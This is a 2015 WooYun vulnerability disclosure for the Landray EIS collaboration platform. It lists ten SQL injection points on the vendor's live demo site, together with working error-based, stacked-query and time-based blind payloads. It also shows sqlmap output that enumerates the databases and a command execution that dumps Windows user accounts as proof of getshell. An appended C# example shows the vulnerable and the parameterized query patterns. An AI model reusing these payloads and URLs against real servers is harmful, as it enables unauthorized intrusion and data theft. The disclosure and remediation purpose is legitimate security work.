
Vulnerability summary

Defect ID: wooyun-2015-0111278

Title: Landray (蓝凌) EIS smart collaboration platform: 10 SQL injection + getshell points bundled (tested on the demo site, no login required)

Vendor: 深圳市蓝凌软件股份有限公司 (Shenzhen Landray Software Co., Ltd.)

Author: 路人甲

Submitted: 2015-05-04 17:35

Fixed: 2015-06-18 17:36

Published: 2015-06-18 17:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-05-04: Actively contacting the vendor and awaiting acknowledgement; details not disclosed publicly
2015-06-18: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

Official demo site: eisdemo.landray.com.cn

0x1:
http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
0x2:
http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=1'
0x3:
http://eisdemo.landray.com.cn/webdoc/HtmlSignatureServer.aspx?DocumentID=1'&SignatureID=1&Signature=1&COMMAND=SHOWSIGNATURE
0x4:
http://eisdemo.landray.com.cn/vote/service.aspx
post:action=voteid&ID=1'
0x5:
http://eisdemo.landray.com.cn/sm/bulkinsert_data.aspx?id=1'
0x6:
http://eisdemo.landray.com.cn/sm/data_manager_right_edit.aspx?tableid=1'
0x7:
http://eisdemo.landray.com.cn/sm/DictKey.aspx?DictKey=1'
0x8:
http://eisdemo.landray.com.cn/sm/menu_define.aspx?id=1 and 1=(select @@version)
0x9:
http://eisdemo.landray.com.cn/sm/menu_emp_edit.aspx?ID=(select @@version)
0x10:
http://eisdemo.landray.com.cn/sm/menu_left_edit.aspx?post:action=dragdrop&id=1&parent_id=1 where 1=(select @@version)--


Some affected instances:

Proof of vulnerability:

http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'
Appending a single quote returns:
“/”应用程序中的服务器错误。
字符串 '19e789719ac343679c070110c147290e'' 后的引号不完整。
'19e789719ac343679c070110c147290e'' 附近有语法错误。
说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.Data.SqlClient.SqlException: 字符串 '19e789719ac343679c070110c147290e'' 后的引号不完整。
'19e789719ac343679c070110c147290e'' 附近有语法错误。
源错误:
执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=(select%20@@version)
“/”应用程序中的服务器错误。
在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
Jun 28 2012 08:36:30
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
' 转换成数据类型 int 时失败。
说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 3419=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (3419=3419) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(103)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (4391=4391) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5, Microsoft Share Point 15.0.0.4420
back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] EISdemo
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] Search_Service_Application_AnalyticsReportingStoreDB_a40959bae29942a9997792ecfb09122a
[*] Search_Service_Application_CrawlStoreDB_4e7a0e760e424a92ab601663836678a6
[*] Search_Service_Application_DB_3ea5977f6e4b46dc8e12ccaf6aebd519
[*] Search_Service_Application_LinksStoreDB_7f7c2ee474204a4b9b5773950b8735e2
[*] SharePoint_AdminContent_8d9aeb53-99b7-4c74-8e2f-133b2728da14
[*] SharePoint_Config
[*] tempdb
[*] WSS_UsageApplication
command standard output:
---
\\WIN-K56VKIJLEMJ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
---
So that is getshell.

Fix recommendation:

The vendor knows how.
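The report leaves the remedy to the vendor. As an added illustration (not Landray's code), this hypothetical ASP.NET handler shows the string-concatenation pattern that produces the SQL Server errors quoted in the proof section, beside a parameterized version; the table and column names (`WebDoc`, `Guid`, `Id`, `FileName`, `Content`, `Title`, `Body`) are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;
using System.Web;

// Hypothetical stand-in for webdoc/file_download.aspx and file_show.aspx.
public static class SafeDocQueries
{
    // The errors in the report ("字符串 ... 后的引号不完整" and
    // "在将 nvarchar 值 ... 转换成数据类型 int 时失败") are what T-SQL emits
    // when a request value is pasted straight into the statement text:
    public static string VulnerableSql(string guid)
    {
        // guid=...' breaks the string literal; id=(select @@version) runs as SQL.
        return "SELECT FileName, Content FROM WebDoc WHERE Guid = '" + guid + "'";
    }

    // Hardened: the value travels as a typed parameter, never as SQL text.
    public static SqlCommand DownloadCommand(SqlConnection conn, string guid)
    {
        // The identifier in the report is 32 hex characters; reject any other
        // shape before it reaches the database (assumed format).
        if (guid == null || !Regex.IsMatch(guid, "^[0-9a-fA-F]{32}$"))
            throw new HttpException(400, "invalid guid");

        var cmd = new SqlCommand(
            "SELECT FileName, Content FROM WebDoc WHERE Guid = @guid", conn);
        cmd.Parameters.Add("@guid", SqlDbType.NVarChar, 32).Value = guid;
        return cmd;
    }

    public static SqlCommand ShowCommand(SqlConnection conn, string idText)
    {
        // file_show.aspx compares against an int column: parse the request
        // value as an int in application code instead of letting SQL Server
        // CONVERT it, which is what surfaces @@version in the conversion error.
        if (!int.TryParse(idText, out int id))
            throw new HttpException(400, "invalid id");

        var cmd = new SqlCommand(
            "SELECT Title, Body FROM WebDoc WHERE Id = @id", conn);
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
        return cmd;
    }
}
```

Setting `<customErrors mode="On">` in web.config stops the SqlException text the proof section relies on from reaching the client, but it only hides the symptom; the parameterized statements are the fix.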

Copyright notice: please credit 路人甲@乌云 when republishing.


Vulnerability response

Vendor response:

Could not reach the vendor, or the vendor actively declined

Vulnerability Rank: 15 (WooYun rating)